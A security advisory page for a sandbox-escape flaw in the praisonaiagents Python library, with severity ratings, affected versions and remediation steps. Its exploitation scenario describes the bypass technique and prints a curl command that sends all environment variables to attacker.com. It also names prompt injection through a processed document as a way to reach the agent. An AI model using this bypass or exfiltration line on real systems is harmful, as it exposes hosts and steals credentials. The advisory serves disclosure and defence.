CVE-2026-47392: praisonaiagents: RCE via Python sandbox bypass
GHSA-4mr5-g6f9-cfrh CRITICAL CISA: ATTENDA critical (CVSS 9.9, scope changed) sandbox escape in praisonaiagents v1.6.37 and earlier allows any low-privileged user who can submit code to an AI agent to execute arbitrary OS commands on the host, fully defeating the library's AST-based security sandbox using standard CPython built-in attributes. This is a novel bypass that survives all three prior CVE patches for this component, and a working four-line proof-of-concept is published in the advisory itself — making exploitation trivial for anyone with access to the code execution interface, whether directly or via prompt injection. With all three CIA pillars at High and scope changed, the blast radius reaches full host compromise: environment variables, API keys, filesystem, and internal network access are all exposed. Upgrade praisonaiagents to 1.6.40 and PraisonAI to 4.6.40 immediately; until patched, isolate any workload invoking execute_code() behind OS-level sandboxing and treat any host running the vulnerable version with untrusted input as potentially compromised.
What is the risk?
Critical risk. CVSS 9.9 with scope change means this vulnerability escapes its intended security boundary and reaches the host OS. Network-accessible (AV:N), low complexity (AC:L), low privileges required (PR:L) — any authenticated agent user qualifies as an attacker. No user interaction is needed. The denylist-based AST sandbox is architecturally fragile: this is the fourth distinct bypass in the same component, and the advisory explicitly states that in-process Python sandboxes are fundamentally insecure by design. The 69 prior CVEs logged against praisonaiagents indicate a pattern of persistent unresolved security debt in this package, raising the overall risk posture beyond the single CVE score.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI | pip | <= 4.6.39 | 4.6.40 |
| PraisonAI Agents | pip | <= 1.6.39 | 1.6.40 |
How severe is it?
What is the attack surface?
What should I do?
5 steps-
PATCH IMMEDIATELY
Upgrade praisonaiagents to >=1.6.40 and PraisonAI to >=4.6.40.
-
ISOLATE (until patched): Wrap execute_code() workloads in OS-level sandboxing — Docker with seccomp/AppArmor, gVisor, or nsjail. Disable outbound network egress from agent processes where code execution is required.
-
AUDIT
Search all production codebases for 'from praisonaiagents' and 'execute_code' or 'python_tools' imports; prioritize externally-exposed or prompt-driven deployments.
-
DETECT
Monitor for unusual child process spawning from Python agent processes (os.popen, subprocess, /bin/sh); alert on environment variable enumeration patterns or unexpected outbound connections originating from AI agent processes.
-
LONG-TERM: Replace in-process AST sandboxing with containerized execution (Docker SDK, Firecracker microVMs, WebAssembly runtimes) for any workload that must execute untrusted code.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-47392?
A critical (CVSS 9.9, scope changed) sandbox escape in praisonaiagents v1.6.37 and earlier allows any low-privileged user who can submit code to an AI agent to execute arbitrary OS commands on the host, fully defeating the library's AST-based security sandbox using standard CPython built-in attributes. This is a novel bypass that survives all three prior CVE patches for this component, and a working four-line proof-of-concept is published in the advisory itself — making exploitation trivial for anyone with access to the code execution interface, whether directly or via prompt injection. With all three CIA pillars at High and scope changed, the blast radius reaches full host compromise: environment variables, API keys, filesystem, and internal network access are all exposed. Upgrade praisonaiagents to 1.6.40 and PraisonAI to 4.6.40 immediately; until patched, isolate any workload invoking execute_code() behind OS-level sandboxing and treat any host running the vulnerable version with untrusted input as potentially compromised.
Is CVE-2026-47392 actively exploited?
No confirmed active exploitation of CVE-2026-47392 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-47392?
1. PATCH IMMEDIATELY: Upgrade praisonaiagents to >=1.6.40 and PraisonAI to >=4.6.40. 2. ISOLATE (until patched): Wrap execute_code() workloads in OS-level sandboxing — Docker with seccomp/AppArmor, gVisor, or nsjail. Disable outbound network egress from agent processes where code execution is required. 3. AUDIT: Search all production codebases for 'from praisonaiagents' and 'execute_code' or 'python_tools' imports; prioritize externally-exposed or prompt-driven deployments. 4. DETECT: Monitor for unusual child process spawning from Python agent processes (os.popen, subprocess, /bin/sh); alert on environment variable enumeration patterns or unexpected outbound connections originating from AI agent processes. 5. LONG-TERM: Replace in-process AST sandboxing with containerized execution (Docker SDK, Firecracker microVMs, WebAssembly runtimes) for any workload that must execute untrusted code.
What systems are affected by CVE-2026-47392?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, code execution agents, multi-agent systems, AI development environments.
What is the CVSS score for CVE-2026-47392?
CVE-2026-47392 has a CVSS v3.1 base score of 9.9 (CRITICAL). The EPSS exploitation probability is 0.88%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0037 Data from Local System AML.T0050 Command and Scripting Interpreter AML.T0051.001 Indirect AML.T0053 AI Agent Tool Invocation AML.T0105 Escape to Host AML.T0107 Exploitation for Defense Evasion Compliance Controls Affected
What are the technical details?
Original Advisory
PraisonAI is a multi-agent teams system. Prior to version 4.6.40 of PraisonAI, corresponding to version 1.6.40 of praisonaiagents, `execute_code()` in `praisonaiagents/tools/python_tools.py` (v1.6.37, subprocess sandbox mode) can be fully bypassed using `print.__self__` to retrieve the real Python `builtins` module, from which `__import__` can be extracted via `vars()` and runtime string construction. This achieves arbitrary OS command execution on the host, completely defeating the sandbox. This is a novel bypass that survives all patches for CVE-2026-39888 (frame traversal), CVE-2026-34938 (str subclass), and CVE-2026-40158 (`type.__getattribute__` trampoline). PraisonAI version 4.6.40 and praisonaiagents version 1.6.40 contain an updated fix.
Exploitation Scenario
An attacker targeting an organization running praisonaiagents for automated code analysis or generation submits a malicious request: the payload is embedded in user input or injected via a malicious document processed by the agent. The agent passes the code to execute_code(), which runs the AST validator. The four-line payload accesses print.__self__ (not in _blocked_attrs) to obtain the real CPython builtins module, calls b.vars(b) to get builtins.__dict__ (the ast.Call check only fires on ast.Name nodes, so b.vars(b) via ast.Attribute passes silently), constructs the string '__import__' via concatenation of five innocent substrings (bypassing constant inspection), then calls os.popen('curl attacker.com/exfil?d=$(printenv | base64 -w0)').read(). All environment variables — including LLM API keys, database passwords, and cloud tokens — are silently exfiltrated. The agent returns a clean success result to the caller with no error indication.
Weaknesses (CWE)
CWE-184 Incomplete List of Disallowed Inputs
Primary
CWE-693 Protection Mechanism Failure
Primary
CWE-184 Incomplete List of Disallowed Inputs CWE-184 Incomplete List of Disallowed Inputs CWE-693 Protection Mechanism Failure CWE-693 Protection Mechanism Failure CWE-184 — Incomplete List of Disallowed Inputs: The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.
- [Implementation] Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2026-61447 10.0 PraisonAI: RCE via unsandboxed LLM code execution
Same package: praisonai CVE-2026-48168 10.0 PraisonAI: shell injection in Claude Action enables RCE
Same package: praisonai GHSA-vmmj-pfw7-fjwp 9.9 praisonai: sandbox escape gives RCE via codeMode tool
Same package: praisonai CVE-2026-61445 9.9 PraisonAI: AICoder root RCE via unsanitized tool calls
Same package: praisonai GHSA-vc46-vw85-3wvm 9.8 PraisonAI: RCE via malicious workflow YAML execution
Same package: praisonai